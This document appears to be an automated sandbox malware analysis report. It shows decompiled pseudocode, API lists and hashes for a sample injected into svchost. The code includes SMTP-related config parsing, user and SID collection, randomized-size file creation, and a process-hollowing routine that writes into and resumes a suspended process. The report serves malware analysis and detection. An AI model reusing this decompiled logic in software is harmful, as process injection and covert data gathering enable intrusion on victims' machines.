								_t51 = 0x2523638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x2523634;
							}
						} else {
							_t51 = 0x2523630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0251EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0251EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0251EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0251EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0251EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0251EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

























                                                                                                                                  0x0251be40
                                                                                                                                  0x0251be43
                                                                                                                                  0x0251be4c
                                                                                                                                  0x0251be53
                                                                                                                                  0x0251be71
                                                                                                                                  0x0251be71
                                                                                                                                  0x0251be77
                                                                                                                                  0x0251be7a
                                                                                                                                  0x0251bf62
                                                                                                                                  0x0251bf6e
                                                                                                                                  0x0251bf83
                                                                                                                                  0x0251bf94
                                                                                                                                  0x0251bf98
                                                                                                                                  0x0251bf9d
                                                                                                                                  0x0251bf9f
                                                                                                                                  0x0251bf9f
                                                                                                                                  0x0251bf85
                                                                                                                                  0x0251bf85
                                                                                                                                  0x0251bf85
                                                                                                                                  0x0251bf70
                                                                                                                                  0x0251bf70
                                                                                                                                  0x0251bf70
                                                                                                                                  0x0251bfa2
                                                                                                                                  0x0251bfa7
                                                                                                                                  0x0251bfab
                                                                                                                                  0x00000000
                                                                                                                                  0x0251bfad
                                                                                                                                  0x0251bfad
                                                                                                                                  0x0251bfaf
                                                                                                                                  0x0251bfbe
                                                                                                                                  0x0251bfb4
                                                                                                                                  0x0251bfb9
                                                                                                                                  0x0251bfba
                                                                                                                                  0x0251bfbd
                                                                                                                                  0x00000000
                                                                                                                                  0x0251bfc8
                                                                                                                                  0x0251bfab
                                                                                                                                  0x0251be80
                                                                                                                                  0x0251be83
                                                                                                                                  0x0251be87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251be8d
                                                                                                                                  0x0251be8d
                                                                                                                                  0x0251be92
                                                                                                                                  0x0251be9b
                                                                                                                                  0x0251be9b
                                                                                                                                  0x0251be9c
                                                                                                                                  0x0251be9d
                                                                                                                                  0x0251bea3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251bea9
                                                                                                                                  0x0251beb1
                                                                                                                                  0x0251beb6
                                                                                                                                  0x0251beb7
                                                                                                                                  0x0251bebc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251bec6
                                                                                                                                  0x0251becb
                                                                                                                                  0x0251bece
                                                                                                                                  0x0251bed2
                                                                                                                                  0x0251bed6
                                                                                                                                  0x0251bedb
                                                                                                                                  0x0251bee1
                                                                                                                                  0x0251bee4
                                                                                                                                  0x0251bee7
                                                                                                                                  0x0251beee
                                                                                                                                  0x0251bef9
                                                                                                                                  0x0251beff
                                                                                                                                  0x0251bf01
                                                                                                                                  0x0251bf01
                                                                                                                                  0x0251bf02
                                                                                                                                  0x0251bf06
                                                                                                                                  0x0251bf0c
                                                                                                                                  0x0251bf10
                                                                                                                                  0x00000000
                                                                                                                                  0x0251bf12
                                                                                                                                  0x0251bf1c
                                                                                                                                  0x0251bf23
                                                                                                                                  0x0251bf26
                                                                                                                                  0x0251bf2c
                                                                                                                                  0x0251bf30
                                                                                                                                  0x0251bf30
                                                                                                                                  0x0251bf37
                                                                                                                                  0x0251bf39
                                                                                                                                  0x0251bf39
                                                                                                                                  0x0251bf37
                                                                                                                                  0x0251bf49
                                                                                                                                  0x0251bf4c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251bf4c
                                                                                                                                  0x0251bf10
                                                                                                                                  0x0251bf4f
                                                                                                                                  0x0251bf4f
                                                                                                                                  0x0251bf52
                                                                                                                                  0x0251bf55
                                                                                                                                  0x0251bf5a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251be61
                                                                                                                                  0x0251be67
                                                                                                                                  0x0251be6b
                                                                                                                                  0x0251bfcd
                                                                                                                                  0x0251bfcd
                                                                                                                                  0x0251bfcd
                                                                                                                                  0x00000000
                                                                                                                                  0x0251be6b

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0251BE4F
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0251BE5B
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0251BE67
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0251BF6A
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0251BF7F
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0251BF94
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                                                                  • API String ID: 1586166983-1625972887
                                                                                                                                  • Opcode ID: f18a775f4ab24fa1d0c2654282547320cf2480ee1278363e422c2e21107b3841
                                                                                                                                  • Instruction ID: 288c36f6dc7e2e8da478b1783a045cdfd87526a9cc7319b05ec3c159f6faf448
                                                                                                                                  • Opcode Fuzzy Hash: f18a775f4ab24fa1d0c2654282547320cf2480ee1278363e422c2e21107b3841
                                                                                                                                  • Instruction Fuzzy Hash: 3351CE75A0122AAFFB119F24C880B6EBFA9BF4534CF444459ED02AB290D730E944CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02516A60 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02516A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x2522180 = 0x5e0d0101;
					 *0x252217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E02516987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x2522180 = 0x5e0d0103;
						 *0x252217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x2522180 = 0x5e0d0102;
					 *0x252217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0251EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0251ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0251ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0251ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}





















                                                                                                                                  0x02516a60
                                                                                                                                  0x02516a68
                                                                                                                                  0x02516a7d
                                                                                                                                  0x02516a83
                                                                                                                                  0x02516a89
                                                                                                                                  0x02516b8c
                                                                                                                                  0x02516b9c
                                                                                                                                  0x02516ba1
                                                                                                                                  0x00000000
                                                                                                                                  0x02516ba1
                                                                                                                                  0x02516a91
                                                                                                                                  0x02516a97
                                                                                                                                  0x02516a9e
                                                                                                                                  0x02516aa1
                                                                                                                                  0x02516ab8
                                                                                                                                  0x02516ac3
                                                                                                                                  0x02516b1d
                                                                                                                                  0x02516b27
                                                                                                                                  0x02516b2f
                                                                                                                                  0x02516b34
                                                                                                                                  0x02516b5f
                                                                                                                                  0x02516b61
                                                                                                                                  0x02516b63
                                                                                                                                  0x02516b86
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b89
                                                                                                                                  0x02516b65
                                                                                                                                  0x02516b78
                                                                                                                                  0x02516b7d
                                                                                                                                  0x02516b7f
                                                                                                                                  0x02516b80
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b80
                                                                                                                                  0x02516b36
                                                                                                                                  0x02516b49
                                                                                                                                  0x02516b4e
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b4e
                                                                                                                                  0x02516ad2
                                                                                                                                  0x02516ad7
                                                                                                                                  0x02516ada
                                                                                                                                  0x02516adc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516ade
                                                                                                                                  0x02516af5
                                                                                                                                  0x02516af5
                                                                                                                                  0x00000000
                                                                                                                                  0x02516afd
                                                                                                                                  0x02516afd
                                                                                                                                  0x02516aff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b01
                                                                                                                                  0x02516b0a
                                                                                                                                  0x02516b17
                                                                                                                                  0x02516b17
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b17
                                                                                                                                  0x02516b03
                                                                                                                                  0x02516b08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b08

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516A7D
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(02519E9D,02519A60,?,?,?,025222F8,?,?,?,02519A60,?,?,02519E9D), ref: 02516ABB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B40
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B4E
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B6F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B7D
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B80
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,02519A60,?,?,02519E9D,?,?,?,?,?,02519E9D,?,00000022,?), ref: 02516B96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188212458-0
                                                                                                                                  • Opcode ID: 5c77ada49a2eb1ecdbda056dd4621c4e0d7a88aeccd2ed5a434ff41be3516c11
                                                                                                                                  • Instruction ID: 582f0628505956d5a00345d9f0ed937d70221a77d9e5c52f4963c5aff48b5271
                                                                                                                                  • Opcode Fuzzy Hash: 5c77ada49a2eb1ecdbda056dd4621c4e0d7a88aeccd2ed5a434ff41be3516c11
                                                                                                                                  • Instruction Fuzzy Hash: B031F176D01209AFEB11AFA08C44EAE7FBDFB99310F054866E611E3280D730855C9F69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02516F5F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E02516F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E02516EDD());
					return _a8;
				}
				E0251EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0251F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0251EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

















                                                                                                                                  0x02516f6c
                                                                                                                                  0x02516f77
                                                                                                                                  0x02516f82
                                                                                                                                  0x00000000
                                                                                                                                  0x02517047
                                                                                                                                  0x02516f88
                                                                                                                                  0x02516f8a
                                                                                                                                  0x02516f8d
                                                                                                                                  0x02516f8d
                                                                                                                                  0x02516f8f
                                                                                                                                  0x02516f90
                                                                                                                                  0x02516f96
                                                                                                                                  0x02516fb3
                                                                                                                                  0x02516fba
                                                                                                                                  0x02516fc9
                                                                                                                                  0x02517025
                                                                                                                                  0x0251703f
                                                                                                                                  0x00000000
                                                                                                                                  0x02517042
                                                                                                                                  0x02516fd6
                                                                                                                                  0x02516fdb
                                                                                                                                  0x02516fe3
                                                                                                                                  0x02516fe4
                                                                                                                                  0x02516fe7
                                                                                                                                  0x02516fe8
                                                                                                                                  0x02516fef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516ff1
                                                                                                                                  0x02516ff4
                                                                                                                                  0x02516ff4
                                                                                                                                  0x02516ff7
                                                                                                                                  0x02516ff7
                                                                                                                                  0x02516ff9
                                                                                                                                  0x02516ffa
                                                                                                                                  0x02517000
                                                                                                                                  0x0251700e
                                                                                                                                  0x02517016
                                                                                                                                  0x02517019
                                                                                                                                  0x0251701f
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,0251D7C3), ref: 02516F7A
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0251D7C3), ref: 02516FC1
                                                                                                                                  • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 02516FE8
                                                                                                                                  • LocalFree.KERNEL32(00000120), ref: 0251701F
                                                                                                                                  • wsprintfA.USER32 ref: 02517036
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                                                                  • String ID: /%d$|
                                                                                                                                  • API String ID: 676856371-4124749705
                                                                                                                                  • Opcode ID: 46dcd9275790cd22d68c58c2fbd0f876a5477cec1468585ddd5f336b69b7cbe4
                                                                                                                                  • Instruction ID: 87a1e8ab997e52c8f4f610c95123d25c110a9fb65e7723eceeac8c95b582e711
                                                                                                                                  • Opcode Fuzzy Hash: 46dcd9275790cd22d68c58c2fbd0f876a5477cec1468585ddd5f336b69b7cbe4
                                                                                                                                  • Instruction Fuzzy Hash: 9B312D72900219AFEB11DFA8D849AEA7BBCFF05314F048156F819DB140DB35E608CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02516CC9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E02516CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x2522e08 != 0) {
					L14:
					return 0x2522e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x2522e08, 0x104) == 0 ||  *0x2522e08 == 0) {
						if(GetWindowsDirectoryA(0x2522e08, 0x104) == 0 ||  *0x2522e08 == 0) {
							E0251EF00(0x2522e08, E02512544(0x25222f8, 0x2520664, 0xb, 0xe4, 0xc8));
							E0251EE2A(_t23, 0x25222f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0251EF1E(0x2522e08, E02512544(0x25222f8, 0x2520658, 0xb, 0xe4, 0xc8));
						E0251EE2A(_t23, 0x25222f8, 0, 0x100);
					}
					L10:
					_t17 = 0x2522e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x2522e09;
						if( *((char*)(_t18 + 0x2522e07)) != 0x5c) {
							 *((char*)(_t18 + 0x2522e08)) = 0x5c;
							 *((char*)(_t18 + 0x2522e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x2522e08);
				if( *_t8() == 0 ||  *0x2522e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}









                                                                                                                                  0x02516cc9
                                                                                                                                  0x02516cd6
                                                                                                                                  0x02516dbe
                                                                                                                                  0x02516dc1
                                                                                                                                  0x02516dc1
                                                                                                                                  0x02516cee
                                                                                                                                  0x02516cfb
                                                                                                                                  0x02516d12
                                                                                                                                  0x02516d1c
                                                                                                                                  0x02516d40
                                                                                                                                  0x02516d60
                                                                                                                                  0x02516d69
                                                                                                                                  0x02516d6e
                                                                                                                                  0x02516d6e
                                                                                                                                  0x02516d86
                                                                                                                                  0x02516d8f
                                                                                                                                  0x02516d98
                                                                                                                                  0x02516d99
                                                                                                                                  0x02516d99
                                                                                                                                  0x02516d9e
                                                                                                                                  0x02516d9f
                                                                                                                                  0x02516d9f
                                                                                                                                  0x02516da1
                                                                                                                                  0x02516da4
                                                                                                                                  0x00000000
                                                                                                                                  0x02516da6
                                                                                                                                  0x02516da6
                                                                                                                                  0x02516daf
                                                                                                                                  0x02516db1
                                                                                                                                  0x02516db8
                                                                                                                                  0x02516db8
                                                                                                                                  0x00000000
                                                                                                                                  0x02516daf
                                                                                                                                  0x02516da4
                                                                                                                                  0x02516cfd
                                                                                                                                  0x02516cfe
                                                                                                                                  0x02516d03
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,025222F8,000000E4,02516DDC,000000C8), ref: 02516CE7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02516CEE
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 02516D14
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02516D2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                                                                  • API String ID: 1082366364-3395550214
                                                                                                                                  • Opcode ID: 8e25ee06a9b2434124382fe50ab85226ca27f71d73d9ae803516f6372cc39049
                                                                                                                                  • Instruction ID: 8e5f6febbd7c48bffa088b4bba4e187349f3df3355fcbdccfe207ef9c3a24ca6
                                                                                                                                  • Opcode Fuzzy Hash: 8e25ee06a9b2434124382fe50ab85226ca27f71d73d9ae803516f6372cc39049
                                                                                                                                  • Instruction Fuzzy Hash: 60213855A822657EF7315B328C89F773E4DAB63704F0E0444FC04E60C0C795994DA2AE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251977C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E0251977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0251EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0251EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						_t33 = E0251637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}









                                                                                                                                  0x0251977c
                                                                                                                                  0x0251978f
                                                                                                                                  0x025197a9
                                                                                                                                  0x025197b9
                                                                                                                                  0x025197cf
                                                                                                                                  0x025197e1
                                                                                                                                  0x025197f3
                                                                                                                                  0x02519811
                                                                                                                                  0x02519819
                                                                                                                                  0x0251981c
                                                                                                                                  0x025197f6
                                                                                                                                  0x025197f9
                                                                                                                                  0x00000000
                                                                                                                                  0x025197f9
                                                                                                                                  0x02519839
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251983e
                                                                                                                                  0x02519856
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251985b
                                                                                                                                  0x00000000
                                                                                                                                  0x02519863
                                                                                                                                  0x025197f5
                                                                                                                                  0x025197f5
                                                                                                                                  0x00000000
                                                                                                                                  0x025197f5
                                                                                                                                  0x025197bb
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,02519947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,025222F8), ref: 025197B1
                                                                                                                                  • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,025222F8), ref: 025197EB
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,025222F8), ref: 025197F9
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,025222F8), ref: 02519831
                                                                                                                                  • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,025222F8), ref: 0251984E
                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,025222F8), ref: 0251985B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 2981417381-2746444292
                                                                                                                                  • Opcode ID: c446b12ebee8eecb12d1976b94599bd131859632ebebe16c6d703dd8f6904238
                                                                                                                                  • Instruction ID: 697a889d2026e7097ca497deb19ec19d24d95ad03505c1f6250a5319ee7a9986
                                                                                                                                  • Opcode Fuzzy Hash: c446b12ebee8eecb12d1976b94599bd131859632ebebe16c6d703dd8f6904238
                                                                                                                                  • Instruction Fuzzy Hash: 3B211D71D41129BBEB219FA1DC49FEF7F7CFF05654F000861B919E1080EB309658CAA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025126FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 26%
                                                                                                                                  			E025126FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x2522bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0251EBCC(0x400);
					_pop(_t48);
					 *0x2522bf8 = _t33;
				}
				E0251EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x2522bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x2522bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x2522bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x2522bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x2522bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x2522bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x2522bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
